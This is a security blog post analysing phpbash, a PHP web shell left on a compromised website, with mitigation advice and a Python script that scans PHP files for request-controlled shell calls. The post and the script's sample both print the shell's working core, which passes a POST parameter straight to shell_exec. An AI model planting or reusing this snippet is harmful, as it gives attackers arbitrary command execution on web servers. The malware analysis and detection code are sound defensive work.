Sucuri Blog

Website Security News

phpbash – A Terminal Emulator Web Shell

September 16, 2020, by Luke Leal

It’s common for hackers to utilize post-compromise tools that contain a graphical user interface (GUI) that can be loaded in the web browser. A GUI generally makes the tool easier to use — and certainly more visually appealing than just raw text.

One example of web malware that uses a GUI is the family of PHP webshells such as r57.

[Image: r57.php file manager GUI]

Instead of the hacker manually submitting crafted GET/POST requests to the r57 PHP file, they can simply load the GUI file manager to modify directories or files with one of its many functions.

phpbash – A Terminal Emulator

Our team recently found a tool, pb.php (phpbash), left behind by a hacker on a compromised website. The tool is a hybrid model, incorporating elements from both the traditional GUI and TUI (text user interface). As its name suggests, the tool is used to emulate a bash terminal in a web browser when the pb.php file is loaded. To provide this emulation, a small HTML GUI is generated by the PHP script which tries to replicate the look and feel of a bash terminal.

[Image: An emulated bash command prompt used to make it easier to run commands via a PHP file]

Functionality

The bash commands are run with the PHP function shell_exec (note: some hosts have this function disabled). Whenever the user presses Enter in the browser-emulated command line, the command is submitted to pb.php in a POST request and handed straight to shell_exec.

<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
    // Run the submitted command, merging stderr into stdout, and split the output into lines
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) {
        // HTML-escape each line so the emulated terminal renders it as plain text
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    // Stop here so the rest of the page (the terminal GUI) is not sent with the output
    die();
}

PHP code used to run the bash command stored in the cmd parameter of the POST request

This type of tool can be useful to an attacker. It gives them access to a large set of commands without having to store any of them in the tool file’s code, since the tool simply passes whatever command it receives to the web server’s shell. As a result, the attacker’s malicious PHP file needs very little PHP code, which makes it easier to evade signature-based detection.

Here is an example of how an attacker can run commands to quickly deploy a phishing kit downloaded from a third-party server:

[Image: It just takes a couple of commands, wget and tar, to download and deploy a phishing kit]

Mitigation

You can harden your hosting environment by disabling PHP functions like system and shell_exec through the php.ini file, but first confirm that none of your existing scripts use them, because those scripts will stop working once the functions are disabled. Our web application firewall can also prevent hackers from using these types of tools by blocking their requests.
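The check described above (confirming that no legitimate script relies on the functions you are about to disable) and the request-driven shape of the phpbash snippet can both be covered by one small audit script. The following is an added example, not Sucuri's tooling or part of the post: it scans PHP sources for calls to shell functions, flags calls whose arguments come directly from a request superglobal (the pattern seen in pb.php), and builds the php.ini line. The function list beyond system and shell_exec, and the three PHP sources, are constructed for the example.

```python
import re

# Functions to disable via php.ini. system and shell_exec are from the post; the
# rest are their common siblings (assumption: this list is the example's, not the post's).
DANGEROUS_FUNCS = ("system", "shell_exec", "exec", "passthru", "popen", "proc_open")

# PHP comments: /* ... */, // ..., # ... (a "//" inside a string literal is a known limitation)
_COMMENT_RE = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.DOTALL)
_TAINT_RE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")


def strip_php_comments(src: str) -> str:
    """Blank out comments but keep their newlines so reported line numbers stay correct."""
    return _COMMENT_RE.sub(lambda m: "\n" * m.group(0).count("\n"), src)


def find_calls(src: str):
    """Return (function, line, tainted) for each call to a dangerous function.
    tainted is True when a request superglobal appears in the argument list."""
    clean = strip_php_comments(src)
    hits = []
    for name in DANGEROUS_FUNCS:
        # Lookbehind skips $system(), ->system() and shell_exec when looking for exec
        for m in re.finditer(r"(?<![\w$>])" + name + r"\s*\(([^;]*)", clean):
            line = clean.count("\n", 0, m.start()) + 1
            hits.append((name, line, _TAINT_RE.search(m.group(1)) is not None))
    return sorted(hits, key=lambda h: h[1])


def audit(files: dict) -> dict:
    """files maps path -> source. Empty result means disable_functions is safe to apply."""
    return {path: hits for path, src in files.items() if (hits := find_calls(src))}


def php_ini_disable_line(extra=()) -> str:
    """The php.ini directive the post recommends, for the functions above."""
    return "disable_functions = " + ",".join(DANGEROUS_FUNCS + tuple(extra))


# Constructed samples: a phpbash-style shell, a legitimate backup job, and a clean file.
PB_PHP = """<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) { echo $line . "<br>"; }
    die();
}
"""
BACKUP_PHP = "<?php\n// nightly archive; path comes from config, not the request\n" \
             "$dir = '/var/www/html';\nexec('tar czf /backups/site.tgz ' . escapeshellarg($dir));\n"
CLEAN_PHP = "<?php\n// shell_exec($_GET['x']) was removed in 2019\n$info = $config->system('name');\n"

if __name__ == "__main__":
    for path, hits in audit({"pb.php": PB_PHP, "backup.php": BACKUP_PHP, "ok.php": CLEAN_PHP}).items():
        for name, line, tainted in hits:
            print(f"{path}:{line}: {name}() {'<- request-controlled argument' if tainted else ''}")
    print(php_ini_disable_line())
```

A tainted hit is a webshell candidate to remove; an untainted hit is a script to rewrite before the directive goes live.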

Categories: Sucuri Labs, Website Malware Infections, Website Security
Tags: Black Hat Tactics, Hacked Websites

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.
